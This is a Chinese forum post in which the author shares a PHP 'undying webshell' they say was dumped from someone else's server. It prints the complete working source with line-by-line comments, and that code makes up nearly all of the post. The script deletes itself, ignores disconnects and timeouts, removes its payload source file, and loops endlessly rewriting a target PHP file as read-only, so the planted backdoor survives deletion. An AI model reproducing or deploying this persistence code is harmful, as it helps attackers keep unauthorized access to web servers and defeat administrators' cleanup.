搜索
查看: 2638|回复: 0

php不死马

[复制链接]

69

主题

116

帖子

285

积分

中级会员

牛逼的金牌会员

Rank: 3Rank: 3

积分
285
QQ
发表于 2018-4-4 20:11:56 | 显示全部楼层 |阅读模式

在别人服务器上dump下了这个文件,分析了一下,是一个挺有意思的不死马,分析以后跟大家分享一下


所以这算原创还是转载…毕竟不是我写的马 有啥不合适的我再改(


这个不死马的主体是这个文件,不妨叫Trojan.php

  1. <?php
  2. @unlink($_SERVER['SCRIPT_FILENAME']); //删除自身
  3. error_reporting(0); //禁用错误报告
  4. ignore_user_abort(true); //忽略与用户的断开,用户浏览器断开后继续执行
  5. set_time_limit(0); //执行不超时

  6. $js = 'unlock.txt'; //用来判断是否终止执行锁定(解锁)的文件标记
  7. $mb = 'error_reporting.php'; //要锁定的文件路径
  8. $rn = 'error_reporting.txt'; //要锁定的内容
  9. $nr = file_get_contents($rn); //从文件中读取要锁定的内容
  10. @unlink($rn); //删除“要锁定的文件内容”,不留痕迹

  11. //创建一个后台执行的死循环
  12. while (1==1) {
  13.     //先判断是否需要解除锁定,防止后台死循环造成各种冲突
  14.     if (file_exists($js)) {
  15.         @unlink($js); //删除解锁文件
  16.         exit(); //终止程序
  17.     }
  18.     else {
  19.         @unlink($mb); //先删除目标文件
  20.         chmod($mb, 0777);  //设置属性
  21.         @unlink($mb); //先删除目标文件
  22.         file_put_contents($mb, $nr); //锁定内容 //$fk = fopen($mb, w); fwrite($fk, $nr); fclose($fk);
  23.         chmod($mb, 0444);  //设置属性
  24.         usleep(1000000); //等待1秒
  25.     }
  26. };
  27. ?>
复制代码


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表